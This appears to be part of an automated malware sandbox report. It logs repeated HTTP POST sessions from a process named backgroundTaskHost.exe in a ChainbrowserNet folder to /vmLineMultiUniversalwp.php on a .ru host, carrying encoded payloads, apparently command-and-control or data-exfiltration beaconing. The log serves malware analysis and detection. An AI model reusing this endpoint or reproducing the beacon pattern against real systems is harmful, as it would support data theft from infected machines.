                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SY8MnhMh4OxVzXU5eyI3tPQaqrkvVZPo0msPvEjGBVrdaHr8RQMRfRpPu7aHHpqebN0ZKH7Venbk%2B8kXUc1cjWwXEgNTsWKZ8UhN2lakMADLEX7qn12spwAyatGoL1YuzfOaIXvf"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6de31b07c359-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1679&rtt_var=842&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=576847&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          81192.168.2.450089104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:46.957767010 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          82192.168.2.450090104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:47.020467997 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:47.373619080 CET2520OUTData Raw: 54 5b 5e 57 55 5b 5f 51 5c 5b 52 58 57 5d 58 53 58 53 5a 5a 52 53 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^WU[_Q\[RXW]XSXSZZRSQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*) +5V%#+*6"2'=#P .R+,*63 ."+;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:47.484000921 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:47.669924974 CET802INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=phwBvTIGaARmFw%2Bwt3%2F9YzlrLNbuxBtTABDJRKsUArSQY8sSULekWfHun1Wgn4nkundlyY0iKSOkjZ4XibKQ5T7oSKAXc4XlNhXtD7CuAcifHSXViA1HZE6NMRUN2ASksAllbapg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6de87dd543e9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4537&min_rtt=1615&rtt_var=6451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58407&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          83192.168.2.450091104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:47.799089909 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:48.154875994 CET2520OUTData Raw: 54 5a 5e 50 55 5e 5a 54 5c 5b 52 58 57 5d 58 52 58 56 5a 5f 52 56 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^PU^ZT\[RXW]XRXVZ_RVQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=,48)P%#<(,9\"=]$34=&R?'Y(( :^++!Y#!Y,
                                                                                          Jan 4, 2025 11:08:48.266567945 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:48.535690069 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4Zeo%2BrP0juc9I0Je%2FBgassUThudLZoEBqYZ3difBMAE51Tlc1DR97bDMiPcZOxIzd7pC9oJE9F293nGCkb1Mn8TZME0crldyh6yOo%2FIBbcuLeXa8cXm2P5iMWtRQ%2BlNw%2F9w6oGR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ded5b96c425-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=1464&rtt_var=6311&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=59555&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          84192.168.2.450092104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:48.657919884 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:49.014261007 CET2520OUTData Raw: 51 5b 5e 50 50 5b 5a 50 5c 5b 52 58 57 5c 58 59 58 50 5a 5a 52 50 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^PP[ZP\[RXW\XYXPZZRPQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E>7C4^!20(>6>%3<4..P<?(6;[42>+!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:49.101818085 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:49.273797035 CET817INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBOJPo%2FnhB6p%2B%2BJO7X4cYXvhVEO53Sue%2FlxGop14kg5JFnAsX5LsMYri5Ra%2FJtvKnGRtCD0ApnTSKNJWgY7nCdCACkhzlwPFLX21XhF%2BU%2F8XNqrHA%2B%2FJxkiJOqaK4u2YrTSy8pKL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6df29ce443b6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2269&min_rtt=1694&rtt_var=1787&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=231709&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          85192.168.2.450093104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:49.409013987 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:49.767381907 CET2520OUTData Raw: 54 5c 5e 56 50 59 5a 51 5c 5b 52 58 57 5c 58 5d 58 51 5a 59 52 55 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^VPYZQ\[RXW\X]XQZYRUQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*:7D7;=Q&#(*95=9Y&=87.P+3?6$4["*+!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:49.873485088 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:50.049874067 CET804INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zArjRmase5%2FBvYGQ4aV1Vezz6eLe6NrU8aTkm5vUOy0%2Fk1nBfn1gyeLn0ASWMQ0pThvlVibFlHzBlcT1GTMo61HhSDcl0QqHMe%2BrRBIuLpqF5i7ynylWCUdqnDEqi2zI3d14Ex96"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6df76ef0c3f3-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4658&min_rtt=1542&rtt_var=6810&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=55154&cwnd=189&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          86192.168.2.450094104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:50.181658030 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:50.529908895 CET2520OUTData Raw: 54 50 5e 52 55 5c 5f 53 5c 5b 52 58 57 5b 58 52 58 5d 5a 53 52 5c 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TP^RU\_S\[RXW[XRX]ZSR\QW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.=97C7=% 'Y*?-X"-1Y$>7%?<+4[-)+!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:50.625442982 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:50.801491022 CET808INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:50 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tVQwgpImxFLc3GjGmsednpNn%2FzA7x%2BMflJvq6uW9tkYLRNeByA7tb0w33J5R5EHoEEaP6S6l7v5IxkaMuiIqdA2%2F2WDypT38pIIXVhoB2gct2%2FOR6w1meXgb1ArW%2FJHL92ZEstwn"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dfc2f4641e9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4048&min_rtt=1708&rtt_var=5322&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=71446&cwnd=248&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          87192.168.2.450095104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:50.946079969 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:51.295506001 CET2520OUTData Raw: 54 5e 5b 50 50 5f 5a 5d 5c 5b 52 58 57 5f 58 5c 58 54 5a 5b 52 50 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T^[PP_Z]\[RXW_X\XTZ[RPQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=94 =W&3>5%X$>V (<3?584>:[)!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:51.392688036 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:51.561614037 CET806INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:51 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lFWP90IfdZI8tKroF69ZC48tsZh6XWZ9qfVpLwyYsy1sD22K%2Bx9VB%2F3pRix5aVqM%2FuCZK4tK0M0RPbSpWanEydF9hZYyT3pnhhraNTn0HKNXoDnssIh8DLYv1VLoYZ6WF%2FME0iGK"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e00efc80f81-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3717&min_rtt=1483&rtt_var=5025&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=75417&cwnd=238&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          88192.168.2.450096104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:51.691906929 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          89192.168.2.450097104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:52.304250002 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:52.654879093 CET1844OUTData Raw: 54 59 5e 56 50 58 5a 56 5c 5b 52 58 57 5e 58 5d 58 54 5a 5a 52 5c 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TY^VPXZV\[RXW^X]XTZZR\QZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.@*)'D4;!W'0 )1Z!.6&-?P -?/<\ %>!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:52.749561071 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.003010988 CET952INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hW8fWFAjUzGEdplCl81aZbDGW1oYlWbtVje9NGB3V5quQAWBsQUrtFNNSOqLvkpTgH7EjtEeqRnUMIjwmyjCtyBWEzzy606Q8ZprFUUaqdc%2FGKlwYJka%2FB8KB4txqJl5zqvHPWxc"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e096aa14225-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8719&min_rtt=2368&rtt_var=13591&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2161&delivery_rate=27453&cwnd=234&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 39 38 0d 0a 02 11 27 0e 2b 2d 27 0f 21 11 28 11 3d 3d 2d 06 26 23 2c 5e 2c 32 37 19 23 12 3f 5b 38 54 26 03 24 20 28 15 3d 01 38 55 34 30 20 0e 24 20 2a 5d 06 12 3b 01 2b 3c 2e 5c 26 15 0c 55 29 22 2a 40 30 36 0b 03 24 2e 23 5a 3c 3c 29 5f 32 05 22 0c 29 2f 2e 10 2e 03 20 08 38 3c 34 12 36 03 21 53 08 13 23 0e 25 1f 2c 0d 28 20 31 59 31 0a 3e 04 26 3a 34 0f 2a 16 06 16 27 3d 22 5a 2d 0f 20 05 28 0d 24 5b 2e 3d 27 03 28 00 30 0f 24 06 22 5c 20 01 23 56 05 3d 57 4c 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 98'+-'!(==-&#,^,27#?[8T&$ (=8U40 $ *];+<.\&U)"*@06$.#Z<<)_2")/.. 8<46!S#%,( 1Y1>&:4*'="Z- ($[.='(0$"\ #V=WL0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          90192.168.2.450098104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:52.304472923 CET317OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:52.655009985 CET2520OUTData Raw: 54 5c 5e 52 55 5d 5a 55 5c 5b 52 58 57 52 58 5b 58 51 5a 5b 52 56 51 5b 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T\^RU]ZU\[RXWRX[XQZ[RVQ[^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*"8>2#X=<&#>=$-+R#6+,/]+&;#[2);!Y#!Y,
                                                                                          Jan 4, 2025 11:08:52.749078035 CET25INHTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:53.021141052 CET801INHTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:52 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9lHtBVjnrDhzPgfxRFxgu1d0fOJHRAEnVqBc1H81JVCaXpOio5poqrYQlsq9gETtbaxzwznslAjCGmSpgk4P998kTgvSJvRWjkI6wqfclGDf1baDJZwPh8xMEEDJUyVGpN2%2FD1oG"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6e0968924370-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=8577&min_rtt=2144&rtt_var=13670&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=27234&cwnd=230&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                          91192.168.2.450099104.21.38.84806020C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          TimestampBytes transferredDirectionData
                                                                                          Jan 4, 2025 11:08:53.149118900 CET293OUTPOST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:53.498752117 CET2516OUTData Raw: 51 59 5b 54 50 5f 5f 53 5c 5b 52 58 57 5a 58 5c 58 57 5a 53 52 55 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
